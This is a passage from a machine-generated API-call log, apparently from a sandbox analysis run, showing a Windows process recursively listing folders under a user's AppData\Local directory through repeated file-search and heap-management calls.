[0135.546] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd680 | out: hHeap=0x3f0000) returned 1 [0135.546] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x437310 | out: hHeap=0x3f0000) returned 1 [0135.546] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489f8, dwReserved1=0x13d180a, cFileName="Color", cAlternateFileName="")) returned 0 [0135.546] FindClose (in: hFindFile=0x91489b8 | out: hFindFile=0x91489b8) returned 1 [0135.547] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9150688 | out: hHeap=0x3f0000) returned 1 [0135.547] FindNextFileA (in: hFindFile=0x9148978, lpFindFileData=0x36ec70 | out: lpFindFileData=0x36ec70*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x13d180a, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0135.547] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174ec8 [0135.547] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x47) returned 0x9150688 [0135.547] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174ec8 | out: hHeap=0x3f0000) returned 1 [0135.547] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x437310 [0135.547] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\*", lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x6f0069, ftCreationTime.dwLowDateTime=0x20006e, ftCreationTime.dwHighDateTime=0x610044, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x1d20000, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489f8, dwReserved1=0x13d180a, cFileName="Color", cAlternateFileName="")) returned 0xffffffff [0135.547] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x437310 | out: hHeap=0x3f0000) returned 1 [0135.547] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9150688 | out: hHeap=0x3f0000) returned 1 [0135.547] FindNextFileA (in: hFindFile=0x9148978, lpFindFileData=0x36ec70 | out: lpFindFileData=0x36ec70*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffffff, dwReserved1=0x13d14b7, cFileName="Apps", cAlternateFileName="")) returned 1 [0135.547] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174ec8 [0135.547] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x47) returned 0x9150688 [0135.547] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174ec8 | out: hHeap=0x3f0000) returned 1 [0135.547] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x437310 [0135.547] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*", lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489f8, dwReserved1=0x13d180a, cFileName=".", cAlternateFileName="")) returned 0x91489b8 [0135.548] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x437310 | out: hHeap=0x3f0000) returned 1 [0135.548] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489f8, dwReserved1=0x13d180a, cFileName="..", cAlternateFileName="")) returned 1 [0135.548] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489f8, dwReserved1=0x13d180a, cFileName="2.0", cAlternateFileName="")) returned 1 [0135.548] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x437310 [0135.548] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0135.548] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*", lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a38, dwReserved1=0x13d180a, cFileName=".", cAlternateFileName="")) returned 0x91489f8 [0135.548] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0135.548] FindNextFileA (in: hFindFile=0x91489f8, lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a38, dwReserved1=0x13d180a, cFileName="..", cAlternateFileName="")) returned 1 [0135.548] FindNextFileA (in: hFindFile=0x91489f8, lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a38, dwReserved1=0x13d180a, cFileName="Data", cAlternateFileName="")) returned 1 [0135.548] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0135.548] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127c30 [0135.548] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*", lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148a38 [0135.588] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127c30 | out: hHeap=0x3f0000) returned 1 [0135.588] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0135.588] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="CJW3O3KP.BX7", cAlternateFileName="")) returned 1 [0135.588] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127c30 [0135.588] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x5f) returned 0x4cd680 [0135.588] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127c30 | out: hHeap=0x3f0000) returned 1 [0135.589] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0135.589] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*", lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148a78 [0135.589] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0135.589] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0135.589] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="6NG60CXZ.9GJ", cAlternateFileName="")) returned 1 [0135.589] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0135.589] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b3f0 [0135.589] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0135.589] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.589] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\*", lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148ab8 [0135.589] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.590] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0135.590] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", cAlternateFileName="GOOGAP~1.000")) returned 1 [0135.590] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127c30 [0135.590] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.590] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x401d10 [0135.590] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.590] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0135.590] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x36df20 | out: lpFindFileData=0x36df20*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148af8 [0135.622] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0135.622] FindNextFileA (in: hFindFile=0x9148af8, lpFindFileData=0x36df20 | out: lpFindFileData=0x36df20*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0135.622] FindNextFileA (in: hFindFile=0x9148af8, lpFindFileData=0x36df20 | out: lpFindFileData=0x36df20*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="Data", cAlternateFileName="")) returned 1 [0135.622] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0135.622] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x46f618 [0135.622] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\*", lpFindFileData=0x36dce8 | out: lpFindFileData=0x36dce8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xa, cFileName=".", cAlternateFileName="")) returned 0x9148b38 [0135.622] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x46f618 | out: hHeap=0x3f0000) returned 1 [0135.622] FindNextFileA (in: hFindFile=0x9148b38, lpFindFileData=0x36dce8 | out: lpFindFileData=0x36dce8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xa, cFileName="..", cAlternateFileName="")) returned 1 [0135.622] FindNextFileA (in: hFindFile=0x9148b38, lpFindFileData=0x36dce8 | out: lpFindFileData=0x36dce8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xa, cFileName="..", cAlternateFileName="")) returned 0 [0135.622] FindClose (in: hFindFile=0x9148b38 | out: hFindFile=0x9148b38) returned 1 [0135.623] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0135.623] FindNextFileA (in: hFindFile=0x9148af8, lpFindFileData=0x36df20 | out: lpFindFileData=0x36df20*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="Data", cAlternateFileName="")) returned 0 [0135.623] FindClose (in: hFindFile=0x9148af8 | out: hFindFile=0x9148af8) returned 1 [0135.623] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0135.623] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", cAlternateFileName="GOOGAP~1.000")) returned 0 [0135.623] FindClose (in: hFindFile=0x9148ab8 | out: hFindFile=0x9148ab8) returned 1 [0135.623] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127c30 | out: hHeap=0x3f0000) returned 1 [0135.623] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b3f0 | out: hHeap=0x3f0000) returned 1 [0135.623] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="6NG60CXZ.9GJ", cAlternateFileName="")) returned 0 [0135.623] FindClose (in: hFindFile=0x9148a78 | out: hFindFile=0x9148a78) returned 1 [0135.623] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd680 | out: hHeap=0x3f0000) returned 1 [0135.623] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="CJW3O3KP.BX7", cAlternateFileName="")) returned 0 [0135.623] FindClose (in: hFindFile=0x9148a38 | out: hFindFile=0x9148a38) returned 1 [0135.625] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0135.625] FindNextFileA (in: hFindFile=0x91489f8, lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a38, dwReserved1=0x13d180a, cFileName="DQQ19BCJ.JAX", cAlternateFileName="")) returned 1 [0135.625] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0135.625] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x5f) returned 0x4cd680 [0135.625] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0135.625] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0135.625] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*", lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a78, dwReserved1=0x13d180a, cFileName=".", cAlternateFileName="")) returned 0x9148a38 [0135.625] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0135.625] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a78, dwReserved1=0x13d180a, cFileName="..", cAlternateFileName="")) returned 1 [0135.625] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a78, dwReserved1=0x13d180a, cFileName="YVORLGOR.PNT", cAlternateFileName="")) returned 1 [0135.625] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0135.625] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.625] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*", lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, 